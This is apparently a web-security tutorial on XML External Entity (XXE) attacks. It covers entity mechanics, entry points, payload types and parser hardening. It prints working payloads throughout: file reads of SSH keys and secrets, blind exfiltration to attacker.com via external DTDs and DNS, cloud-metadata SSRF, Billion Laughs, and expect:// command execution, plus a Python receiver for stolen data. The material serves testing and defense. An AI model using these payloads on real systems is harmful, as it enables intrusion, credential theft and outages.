April 19, 2026 · apsyleg · 1 min read

#xxe #xml #dtd #blind-xxe #ssrf #web-security

XML External Entity (XXE)

1. What Is XXE

XXE is a vulnerability where an XML parser resolves external entities, letting an attacker read files, make server-side requests, and (sometimes) execute code.

Attacker → XML with malicious DTD → Parser → Resolves entity
                                                ↓
                                    file:///etc/passwd
                                    http://169.254.169.254/...
                                    http://internal-service/...

The key point: the parser itself fetches data from the URI in SYSTEM — the attacker just tells it where to go.

This isn't a bug in application code — it's the design of the XML specification from 1998, which most parsers support by default. External entity support was a feature, not a bug. The problem is that "any URI" includes file://, http://, ftp://, and sometimes expect://.

2. Fundamentals: XML, DTD, Entities

XML Entity

An entity is a variable in XML. It's declared in the DTD and used in the document or within the DTD itself.

Two Ways to Classify Entities

By value source:

Type	Value	Example
Internal	Defined directly in DTD	`<!ENTITY name "John">`
External	Loaded from a file/URL	`<!ENTITY name SYSTEM "file:///etc/passwd">`

By usage location:

Type	Syntax	Where it works	Used for
General entity	`&name;`	In the XML document body	Classic XXE
Parameter entity	`%name;`	Only inside the DTD	Blind XXE (OOB)

<!-- General entity — in the document body -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<foo>&xxe;</foo>

<!-- Parameter entity: inside the DTD (a chain like this must live in an external DTD, see the restriction below) -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY send SYSTEM 'http://attacker.com/?d=%file;'>">
%eval;

Why parameter entities matter: in blind XXE you need to build the payload inside the DTD — read a file and embed its contents into a URL. General entities can't do that — they only work in the body. Parameter entities let you substitute values directly within the DTD, building dynamic constructs.

Parameter Entity Restriction in the Internal DTD Subset

Per the XML spec (well-formedness constraint "PEs in Internal Subset"), a parameter-entity reference inside the internal DTD subset may appear only where a whole markup declaration could appear, never inside a declaration. This means a construct like <!ENTITY % a "..."> <!ENTITY % b "<!ENTITY % c SYSTEM '...'> %a;"> %b; inside <!DOCTYPE foo [ ... ]> won't work: %a; is referenced inside the value of another declaration, and the parser rejects it.

This is exactly why blind XXE normally requires an external DTD: the restriction does not apply there. It explains why blind XXE payloads typically load evil.dtd from the attacker's server. Inside a loaded DTD file the parser allows parameter entities to be referenced within other declarations, which enables substitution chains.

Exception — the trick with redefining an entity from a local system DTD (described in section 4, Error-based via entity redefinition). In this case you load a legitimate DTD file from the server itself and redefine one of its entities with your payload.
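The restriction can be observed locally with Python's standard-library parser, which is built on Expat. This is a minimal sketch, assuming the installed Expat enforces the constraint as the spec describes; the two documents and the helper name `parses` are illustrative only.

```python
import xml.etree.ElementTree as ET

# A parameter entity referenced INSIDE another declaration in the internal
# subset. The XML spec forbids this, so a conforming parser should reject it.
NESTED_IN_DECLARATION = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % a "value">
  <!ENTITY b "%a;">
]>
<foo/>"""

# A plain internal general entity: allowed, and expanded in the body.
PLAIN_INTERNAL = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY b "value">
]>
<foo>&b;</foo>"""


def parses(document: str) -> bool:
    """Return True if the parser accepts the document, False on a parse error."""
    try:
        ET.fromstring(document)
        return True
    except ET.ParseError:
        return False
```

Calling `parses(PLAIN_INTERNAL)` and `parses(NESTED_IN_DECLARATION)` shows the difference between an ordinary internal entity and a parameter entity used inside a declaration of the internal subset.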

DTD (Document Type Definition)

DTD is a set of rules describing XML structure. Entities are declared in the DTD.

No DTD = no entity declarations = no XXE.

Where the DTD can live:

<!-- 1. Internal DTD — inside the document itself (between [ and ]) -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

<!-- 2. External DTD — loaded from a URL -->
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">
<foo>&xxe;</foo>

<!-- 3. Combined — internal + external -->
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd" [
  <!ENTITY % local "value">
]>

3. Where to Look for XXE

Obvious Entry Points

API endpoints with Content-Type: application/xml or text/xml
SOAP services (the entire protocol is XML-based)
XML file uploads (configs, feeds, data)
RSS/Atom import

Less Obvious Entry Points

SVG uploads — SVG is XML
DOCX/XLSX/PPTX uploads — ZIP archives with XML inside
GPX uploads — geodata in XML
XHTML — HTML in XML format
SAML — XML-based authentication
PDF generation from XML/XSLT
Configuration files — .xml, .plist, .svg

Content-Type Swap (JSON → XML)

If the application accepts JSON, try switching the format:

# Before:
POST /api/user HTTP/1.1
Content-Type: application/json

{"name": "test", "email": "test@test.com"}

# After:
POST /api/user HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
  <email>test@test.com</email>
</user>

Why this works: frameworks (Spring, ASP.NET, Rails) often pick the parser automatically based on Content-Type. If the XML parser is enabled and not hardened — XXE.

Also check: text/xml, application/xhtml+xml, image/svg+xml.
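A small helper can produce the XML counterpart of a JSON body for this swap. The sketch below assumes a flat JSON object whose keys are valid XML element names; the function name `json_to_xml_probe`, the root element `user`, and the marker value are illustrative choices. It uses a harmless internal entity rather than a file read, so it only confirms that the body is parsed as XML with DTD processing.

```python
import json
from xml.sax.saxutils import escape


def json_to_xml_probe(json_body: str, root: str = "user", marker: str = "testvalue") -> str:
    """Convert a flat JSON object to XML and place an internal entity in the first field."""
    fields = json.loads(json_body)
    lines = [
        '<?xml version="1.0"?>',
        f"<!DOCTYPE {root} [",
        f'  <!ENTITY probe "{marker}">',
        "]>",
        f"<{root}>",
    ]
    for index, (key, value) in enumerate(fields.items()):
        # The first field carries the entity reference, the rest keep their values.
        text = "&probe;" if index == 0 else escape(str(value))
        lines.append(f"  <{key}>{text}</{key}>")
    lines.append(f"</{root}>")
    return "\n".join(lines)
```

Send the result with Content-Type: application/xml; if the marker shows up where the first field is normally echoed, the endpoint accepts XML and expands entities.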

4. XXE Types

4.1 Classic (Non-blind) XXE

The parser's output is reflected in the response, so the file contents are directly visible.

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

Server response:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

4.2 Blind XXE

The parser's output is not reflected in the response. Three approaches:

OOB (Out-of-Band) — Sending Data Out

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo>&send;</foo>

evil.dtd on the attacker's server:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?d=%file;'>">
%all;

The chain:

Parser reads /etc/hostname → into %file
Loads evil.dtd → into %dtd
%all assembles a new entity send with data in the URL
&send; triggers an HTTP request to attacker.com carrying the data

Tools for receiving: Burp Collaborator, interactsh, your own server with python3 -m http.server.
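If you run your own receiver, it has two jobs: serve evil.dtd and record the callback. The following is a rough sketch with Python's standard library, not a replacement for Collaborator or interactsh. `CALLBACK_BASE`, the `/evil.dtd` path, the class name `OOBHandler`, and the port are assumptions; the query parameter `d` matches the payload above.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlsplit

CALLBACK_BASE = "http://attacker.com"  # assumption: placeholder host from the payload


def build_evil_dtd(callback_base: str = CALLBACK_BASE) -> str:
    """Return the two-line external DTD that defines and triggers %all;."""
    inner = "<!ENTITY send SYSTEM '" + callback_base + "/?d=%file;'>"
    return '<!ENTITY % all "' + inner + '">\n%all;\n'


def extract_exfil(request_path: str) -> Optional[str]:
    """Pull the value of the d parameter out of a callback request path."""
    values = parse_qs(urlsplit(request_path).query).get("d")
    return values[0] if values else None


class OOBHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if urlsplit(self.path).path == "/evil.dtd":
            body = build_evil_dtd().encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        leaked = extract_exfil(self.path)
        if leaked is not None:
            print(f"exfiltrated: {leaked!r}")
        self.send_response(204)
        self.end_headers()


def serve(port: int = 8000) -> None:
    """Block and handle requests until interrupted."""
    HTTPServer(("0.0.0.0", port), OOBHandler).serve_forever()
```

Call `serve()` on the host that the payload points at; the exfiltrated value is printed when the parser requests `/?d=...`.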

Error-based — Data in the Error Message

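Useful when the application returns parser error messages in the response. This variant still has to fetch error.dtd from the attacker's server, so it needs outbound access for that one request; when outbound connections are fully blocked, use the local DTD redefinition described below.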

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % dtd SYSTEM "http://attacker.com/error.dtd">
  %dtd;
]>
<foo>&trigger;</foo>

error.dtd:

<!ENTITY % all "<!ENTITY trigger SYSTEM 'file:///nonexistent/%file;'>">
%all;

The parser tries to open file:///nonexistent/web-server-01 → error:

java.io.FileNotFoundException: /nonexistent/web-server-01

→ File contents in the error text.
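Pulling the leaked value out of the error text is simple string handling. This sketch assumes the same `/nonexistent/` marker directory as the payload above; `leaked_from_error` is an illustrative name, and real parsers may append extra text after the path that still needs trimming.

```python
import re
from typing import Optional

MARKER_DIR = "/nonexistent/"  # the bogus directory used in error.dtd


def leaked_from_error(error_text: str, marker_dir: str = MARKER_DIR) -> Optional[str]:
    """Return whatever follows the marker directory in an error message, if present."""
    match = re.search(re.escape(marker_dir) + r"(.*)", error_text, flags=re.DOTALL)
    return match.group(1).strip() if match else None
```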

Error-based via Entity Redefinition (No Outbound Connections)

If you can't even load evil.dtd, but there's a local DTD on the server:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>
<foo>bar</foo>

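You redefine an entity that the local DTD declares, injecting your payload. This works for two reasons. First, when an entity is declared more than once the first declaration wins, and the internal subset is read before %local_dtd; is expanded. Second, the redefined entity is then expanded inside the external DTD, where parameter entities may be referenced within declarations. When outbound connections are fully blocked, this is the main way to get data out of a blind XXE: no external DTD is needed and everything happens locally, but the application must return the parser error.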
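The nested escapes in the payload (`&#x25;`, `&#x26;#x25;`, `&#x27;`) exist because the text is unescaped once per entity layer. The sketch below replays the two layers, using `html.unescape` as a stand-in for the parser's character-reference expansion; that is an approximation for illustration, not how an XML parser is implemented. `ISOAMSO_LINE` is one line of the payload above.

```python
import html

# One line from the redefined %ISOamso; value, exactly as written in the payload.
ISOAMSO_LINE = (
    '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM '
    '&#x27;file:///nonexistent/&#x25;file;&#x27;>">'
)


def expand_char_refs(text: str) -> str:
    """Expand one layer of numeric character references (single pass, no rescanning)."""
    return html.unescape(text)


# Layer 1: the parser reads the value of %ISOamso;
layer1 = expand_char_refs(ISOAMSO_LINE)
# Layer 2: the parser reads the value of %eval; (the text between the double quotes)
eval_value = layer1[layer1.index('"') + 1 : layer1.rindex('"')]
layer2 = expand_char_refs(eval_value)
```

After the first pass `&#x26;#x25;` has become `&#x25;`, and only the second pass turns it into `%`, which is why the innermost declaration needs the extra level of escaping.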

4.3 XXE → SSRF

XXE is a full-fledged vector for SSRF:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<foo>&xxe;</foo>

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-service:8080/admin">
]>
<foo>&xxe;</foo>

All SSRF techniques apply: cloud metadata, port scanning, accessing internal services.

4.4 XXE → DoS (Billion Laughs)

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!-- ... -->
]>
<foo>&lol9;</foo>

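Each level multiplies the size by 10. With the numbering above (lol, then lol2 through lol9), &lol9; expands to 10^8 copies of "lol", about 300 MB from a payload of under 1 KB; the classic variant has one more level and reaches 10^9 copies, about 3 GB. The expansion is exponential in the number of levels, so the parser can exhaust all available memory.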

Doesn't leak data, but useful for:

Confirming DTD processing — if Billion Laughs works, the parser processes entities, so you can try XXE
DoS attacks — taking the service down
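The arithmetic behind the expansion, as a small sketch. `expanded_copies` and `expanded_bytes` are illustrative helper names; `tenfold_levels` counts how many entities reference the previous one ten times (8 for a payload numbered lol, lol2 ... lol9; 9 for the classic variant).

```python
def expanded_copies(tenfold_levels: int, fanout: int = 10) -> int:
    """Number of copies of the base string after the given number of levels."""
    return fanout ** tenfold_levels


def expanded_bytes(tenfold_levels: int, base: str = "lol", fanout: int = 10) -> int:
    """Size of the fully expanded text in bytes (ASCII base string)."""
    return len(base) * expanded_copies(tenfold_levels, fanout)


if __name__ == "__main__":
    for levels in (3, 8, 9):
        print(levels, expanded_copies(levels), expanded_bytes(levels))
```

The payload grows by one short line per level while the output grows tenfold, which is why entity-expansion limits are a more practical defense than request size limits.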

5. XInclude

When It Applies

You don't control the entire XML document — only a piece of data that gets inserted into XML on the server. You can't declare a DOCTYPE (it must be at the beginning of the document).

Example: your input (username, comment) gets embedded into an XML template on the backend.

Payload

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

xmlns:xi — namespace declaration for XInclude
parse="text" — read as text (without this the parser expects valid XML)
No DOCTYPE needed
Only works if the parser supports XInclude and the application has enabled it; it is usually off by default (libxml2, Xerces and most Java parsers support it)
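The scenario can be reproduced locally with Python's standard library. This is a sketch under stated assumptions: `render_profile` is a hypothetical backend template that concatenates user input into XML, and the backend explicitly runs XInclude processing via `xml.etree.ElementInclude`. The demo reads a temporary file it creates itself, and the `href` is a plain filesystem path because that is what `ElementInclude`'s default loader opens.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude
from xml.sax.saxutils import quoteattr


def render_profile(username: str) -> str:
    """Hypothetical backend template: user input lands inside an XML document."""
    return f"<profile><name>{username}</name></profile>"


def xinclude_payload(path: str) -> str:
    """Build an xi:include element that pulls a file in as text."""
    return (
        '<xi:include xmlns:xi="http://www.w3.org/2001/XInclude" '
        f"parse=\"text\" href={quoteattr(path)}/>"
    )


def process(document: str) -> ET.Element:
    """Parse the document and resolve XInclude directives, as the backend would."""
    root = ET.fromstring(document)
    ElementInclude.include(root)
    return root


def demo() -> str:
    """Inject the payload as the username and return what ends up in <name>."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w", encoding="utf-8") as handle:
            handle.write("s3cr3t")
        root = process(render_profile(xinclude_payload(secret)))
        return root.find("name").text
```

No DOCTYPE is involved at any point: the attacker-controlled fragment carries its own namespace declaration and the include is resolved after parsing.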

Hands-on exercise: XInclude Attack (PortSwigger).

6. XXE via File Formats

SVG

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
  <text x="0" y="20">&xxe;</text>
</svg>

Upload as an avatar/image → if the server parses SVG (e.g., converts to PNG) → XXE.

DOCX / XLSX

Create a normal .docx file
Unzip it (it's a ZIP): unzip document.docx -d doc_extracted
Edit doc_extracted/word/document.xml — insert DTD with payload
Re-zip: cd doc_extracted && zip -r ../evil.docx .
Upload to the server

Files inside DOCX where you can insert the payload:

word/document.xml
[Content_Types].xml
_rels/.rels
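The unzip, edit, re-zip steps can also be scripted. The sketch below uses Python's `zipfile` module; `add_doctype` and `repack_docx` are illustrative names, and `DTD` is the basic payload from earlier sections. It only inserts the DOCTYPE after the XML declaration: the `&xxe;` reference still has to be placed somewhere in the document body, and real documents may need extra care (for example a byte-order mark before the declaration).

```python
import zipfile

DTD = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'


def add_doctype(xml_text: str, doctype: str = DTD) -> str:
    """Insert the DOCTYPE right after the XML declaration, or at the top if there is none."""
    if xml_text.startswith("<?xml"):
        end = xml_text.index("?>") + 2
        return xml_text[:end] + "\n" + doctype + xml_text[end:]
    return doctype + "\n" + xml_text


def repack_docx(src: str, dst: str, member: str = "word/document.xml",
                doctype: str = DTD) -> None:
    """Copy every archive member from src to dst, rewriting only the chosen XML part."""
    with zipfile.ZipFile(src) as zin, \
            zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zout:
        for info in zin.infolist():
            data = zin.read(info.filename)
            if info.filename == member:
                data = add_doctype(data.decode("utf-8"), doctype).encode("utf-8")
            zout.writestr(info, data)
```

Passing `member="[Content_Types].xml"` or `member="_rels/.rels"` targets the other parts listed above.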

7. The Bad Character Problem and Bypasses

The Problem

When the parser substitutes file contents, it tries to parse them as XML. If the file contains <, &, ]]> — the parser breaks.

file:///etc/passwd             ✅  — no special characters
file:///var/www/config.php     ❌  — full of < and &
file:///etc/fstab              ❌  — may contain &
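Whether a given file would survive can be approximated locally: expanding a general entity in the body behaves much like pasting the file contents between two tags. The helper below is an illustrative sketch built on that simplification (`survives_inlining` is not a real tool, and the sample strings are made up).

```python
import xml.etree.ElementTree as ET


def survives_inlining(file_content: str) -> bool:
    """Return True if the content still parses when placed inside an element."""
    try:
        ET.fromstring(f"<foo>{file_content}</foo>")
        return True
    except ET.ParseError:
        return False


if __name__ == "__main__":
    print(survives_inlining("root:x:0:0:root:/root:/bin/bash\n"))
    print(survives_inlining("if (a < b && c) {}"))
    print(survives_inlining("DB_PASS=p&ssword"))
```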

Bypass 1: PHP Filter (If the Server Runs PHP)

<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">

The file arrives in base64 — no special characters. Decode on your end.
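Decoding on your end is a one-liner, but responses often come back with line breaks or trimmed padding. A short sketch that tolerates both; `decode_php_filter` is an illustrative name.

```python
import base64


def decode_php_filter(blob: str) -> str:
    """Decode base64 text copied from a response, ignoring whitespace and missing padding."""
    compact = "".join(blob.split())        # drop spaces and newlines
    compact += "=" * (-len(compact) % 4)   # restore padding if it was trimmed
    return base64.b64decode(compact).decode("utf-8", errors="replace")
```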

Bypass 2: CDATA Wrapper via Parameter Entities

evil.dtd:

<!ENTITY % file SYSTEM "file:///var/www/html/config.php">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY wrapped '%start;%file;%end;'>">
%all;

Main XML:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo>&wrapped;</foo>

File contents get wrapped in CDATA → the parser doesn't interpret special characters.

Bypass 3: jar:// Protocol (Java)

jar:http://attacker.com/evil.jar!/file.txt

Java-specific — downloads the archive, extracts it, reads the file inside. Can be used to bypass protocol restrictions.

8. Exploitation: What to Read

System Files

Linux:

file:///etc/passwd
file:///etc/shadow              — password hashes (needs root)
file:///etc/hostname
file:///proc/self/environ       — environment variables (secrets, keys)
file:///proc/self/cmdline       — process arguments
file:///home/user/.ssh/id_rsa   — private SSH key
file:///home/user/.bash_history — command history

Windows:

file:///C:/Windows/win.ini
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/Users/Administrator/.ssh/id_rsa
file:///C:/inetpub/wwwroot/web.config

Application Configs

file:///var/www/html/config.php
file:///var/www/html/.env
file:///var/www/html/wp-config.php
file:///opt/app/application.properties     — Spring Boot
file:///opt/app/application.yml
file:///etc/nginx/nginx.conf
file:///etc/apache2/sites-enabled/000-default.conf

Cloud Metadata (XXE → SSRF)

http://169.254.169.254/latest/meta-data/iam/security-credentials/  — AWS
http://metadata.google.internal/computeMetadata/v1/                — GCP
http://169.254.169.254/metadata/instance                           — Azure

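Only the AWS IMDSv1 endpoint answers a plain GET. GCP requires the Metadata-Flavor: Google header, Azure requires Metadata: true, and AWS IMDSv2 requires a session token obtained with a PUT request. An external entity fetch cannot set headers or change the method, so those endpoints are usually out of reach for XXE alone.

More on SSRF: SSRF (Server-Side Request Forgery).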

9. XXE via XSLT

If the server performs XSLT transformations, the document() function in XSLT can be used to read files and make HTTP requests — similar to XXE, but through a different mechanism. This is a separate attack surface, unrelated to DTD and entities.

File Read via XSLT

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <xsl:copy-of select="document('file:///etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>

SSRF via XSLT

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <xsl:copy-of select="document('http://169.254.169.254/latest/meta-data/')"/>
  </xsl:template>
</xsl:stylesheet>

Why This Works

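XSLT processors (Xalan, Saxon, libxslt) allow document() by default. The function is meant for loading additional XML documents during transformation, and it accepts arbitrary URIs, including file:// and http://. Because document() parses the target as XML, a plain-text file such as /etc/passwd typically produces a parse error instead of content; XSLT 2.0+ processors such as Saxon also provide unparsed-text() for non-XML files.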

Important: even if the application has fully disabled DTD and external entities in the XML parser, XSLT transformation can still be vulnerable. These are two different mechanisms, and defending against one doesn't protect against the other.

10. Chaining with Other Vulnerabilities

XXE rarely exists in a vacuum — exploitation often builds on chains with other vulnerabilities:

Chain	How it works	Impact
XXE → SSRF	External entity with `http://` URI	Cloud metadata, internal services
XXE → LFI	Reading source code → finding new vulnerabilities	Secret disclosure, further escalation
Blind XXE + DNS	DNS exfiltration works even through strict HTTP firewalls	Confirming the vulnerability, slow exfiltration
XXE → RCE	`expect://` (PHP), `jar://` chains, XSLT code execution	Full server control
SSRF → XXE	SSRF to an internal service that parses XML	Reading local files on the internal server

XXE → RCE (PHP + expect)

The expect:// URI scheme in PHP executes shell commands:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<foo>&xxe;</foo>

If the server returns uid=33(www-data)... — that's RCE. Requirements: PHP + the expect extension loaded. Rare in production, common in CTFs.

DNS Exfiltration

When outbound HTTP is fully blocked, DNS queries often get through:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY send SYSTEM 'http://%file;.attacker.com/'>">
%eval;

Data arrives as a subdomain in the DNS query — track it via Burp Collaborator or interactsh.
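On the receiving side, the data is whatever precedes your zone in the queried name. A minimal sketch, assuming the zone `attacker.com` from the payload; `data_from_query` and `is_dns_safe` are illustrative helpers. The second function shows the main limitation: the parser cannot encode anything, so only values that already look like a single hostname label survive the lookup.

```python
import re
from typing import Optional

ZONE = "attacker.com"  # assumption: the zone you control, as in the payload


def data_from_query(qname: str, zone: str = ZONE) -> Optional[str]:
    """Return the labels in front of the zone, or None if the name is not under it."""
    name = qname.rstrip(".").lower()
    suffix = "." + zone.rstrip(".").lower()
    if not name.endswith(suffix):
        return None
    return name[: -len(suffix)]


def is_dns_safe(value: str) -> bool:
    """True if the value can travel as one DNS label without any encoding."""
    return re.fullmatch(r"[A-Za-z0-9-]{1,63}", value) is not None
```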

11. Testing Methodology

Step 1: Discover Entry Points

Find all endpoints that accept XML (Content-Type, SOAP, files)
Check file uploads: SVG, DOCX, XLSX, XML
Try swapping Content-Type from JSON to XML
Check SAML endpoints

Step 2: Test DTD Processing

Send a harmless payload — if the parser processes DTD, XXE is possible:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe "testvalue">
]>
<foo>&xxe;</foo>

If the response contains testvalue → DTD is processed → try an external entity.
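The probe and the check can be scripted. In the sketch below, `build_probe` and `dtd_processed` are illustrative names, and `echo_backend` is a hypothetical local stand-in for a target that parses the body and reflects the root element's text; against a real application you would send the probe over HTTP and inspect the response body.

```python
import xml.etree.ElementTree as ET


def build_probe(marker: str = "testvalue") -> str:
    """Build the harmless internal-entity probe from Step 2."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY xxe "{marker}">\n'
        "]>\n"
        "<foo>&xxe;</foo>"
    )


def dtd_processed(response_body: str, marker: str = "testvalue") -> bool:
    """True if the entity was expanded: the marker is present and the raw reference is not."""
    return marker in response_body and "&xxe;" not in response_body


def echo_backend(xml_text: str) -> str:
    """Hypothetical target: parse the XML and reflect the root element's text."""
    return ET.fromstring(xml_text).text or ""
```

A unique marker per request (for example a random string) avoids false positives when the application echoes the request body verbatim.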

Step 3: Determine the Type

Situation	Type	Approach
Parser response is visible	Classic	`SYSTEM "file:///etc/passwd"`
Response not visible, outbound allowed	Blind OOB	Parameter entities + external DTD
Response not visible, outbound blocked, errors returned	Blind Error-based	Local DTD redefinition (the error.dtd variant needs one outbound fetch)
You don't control DOCTYPE	XInclude	`xi:include`

Step 4: Exploitation

1. file:///etc/passwd              → confirm file read
2. file:///proc/self/environ       → secrets from env
3. file:///home/user/.ssh/id_rsa   → SSH keys
4. http://169.254.169.254/...      → cloud credentials
5. http://internal:PORT/...        → SSRF to internal services
6. php://filter/...                → read PHP code (base64)

Step 5: If It Doesn't Work

Try other protocols: file://, http://, php://, jar://
Try parameter entities instead of general
Try XInclude
Try the error-based approach
Try via files (SVG, DOCX)
Check other Content-Type values
Try UTF-16 encoding (some filters only check for DOCTYPE in ASCII)
Split the payload across multiple entity definitions

12. XXE Defense

The Right Approach — Disable DTD / External Entities

Java (DocumentBuilderFactory) — most reliable:

// Disallow DOCTYPE entirely
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

Java (SAXParserFactory):

SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

Python (lxml):

from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)

PHP:

libxml_disable_entity_loader(true);  // PHP < 8.0
// In PHP 8.0+ external entities are disabled by default

C# (.NET):

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;

Ruby (Nokogiri):

Nokogiri::XML(xml) { |config| config.nonet }

The LIBXML_NOENT Trap in PHP

// VULNERABLE — ENABLES entity substitution:
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);

// SAFE — without the flag:
$doc = simplexml_load_string($xml);

LIBXML_NOENT = "substitute entity values into text" → the parser resolves external entities → XXE.

The name is misleading: "NO ENT" looks like "no entities", but it actually means "no entities in the output" (replace them with their values).

Parser Defaults by Language and Version

Language / Library	Safe by default?	Since version	Note
Java `DocumentBuilderFactory`	No	—	Requires explicit configuration even in Java 17+
Java `SAXParserFactory`	No	—	Same
PHP `simplexml_load_string`	Yes	PHP 8.0+	PHP <8 needs `libxml_disable_entity_loader(true)`
PHP + `LIBXML_NOENT`	NO!	—	The flag enables entity substitution (trap)
Python `lxml`	Partially	5.0+	`no_network=True` by default; `resolve_entities` defaults to `True` before 5.0 (local files can be read) and to `'internal'` from 5.0 on
Python `defusedxml`	Yes	always	Purpose-built for safe parsing
Python `xml.etree.ElementTree`	Partially	—	Doesn't support external entities, but vulnerable to Billion Laughs
.NET `XmlReader`	Yes	.NET Core	In .NET Framework depends on version
Ruby `Nokogiri`	Yes	1.13+	`NONET` by default
libxml2	Yes	2.9+	But `LIBXML_NOENT` breaks the protection

General Principles

Disable DTD entirely — don't try to filter individual entities
Don't trust defaults — in many languages external entities are enabled by default
Validate Content-Type — don't accept XML if you're not expecting it
Parse files safely — SVG, DOCX, XLSX should be parsed with entities disabled
Don't rely on filtering input data: filters get bypassed (UTF-16, parameter entities)
Don't use XML where JSON would work
Check parsers for all formats that can contain XML: SVG, DOCX, XLSX, SAML
Track specific versions of libraries and their defaults — don't rely on "probably safe"
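For Python code that has to stay on the standard library, "disable DTD entirely" can be approximated by rejecting any document that contains a DOCTYPE before handing it to ElementTree. This is a sketch of that idea, not a substitute for defusedxml: the input is scanned once with Expat and then parsed again, and the names `DoctypeForbidden` and `parse_without_dtd` are illustrative.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""


def _on_doctype(name, system_id, public_id, has_internal_subset):
    # Abort as soon as the DOCTYPE starts, before any entity is declared.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_without_dtd(data: bytes) -> ET.Element:
    """Parse XML, refusing any input that declares a DOCTYPE."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _on_doctype
    scanner.Parse(data, True)  # raises DoctypeForbidden, or expat.ExpatError if malformed
    return ET.fromstring(data)
```

Rejecting the DOCTYPE outright also covers Billion Laughs, since no entity declarations are ever processed.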

13. Severity Assessment

Severity	Conditions
Critical	Reading arbitrary files with secrets, cloud credentials via SSRF, RCE via chain
High	Reading system files (`/etc/passwd`, configs), SSRF to internal network
Medium	Blind XXE with limited exfiltration, SSRF only to specific hosts
Low	DoS only (Billion Laughs), DTD is processed but external entities are blocked

14. Tools

Tool	Purpose
Burp Suite	Intercepting requests, swapping Content-Type, testing payloads
Burp Collaborator / interactsh	Confirming blind XXE (OOB callback)
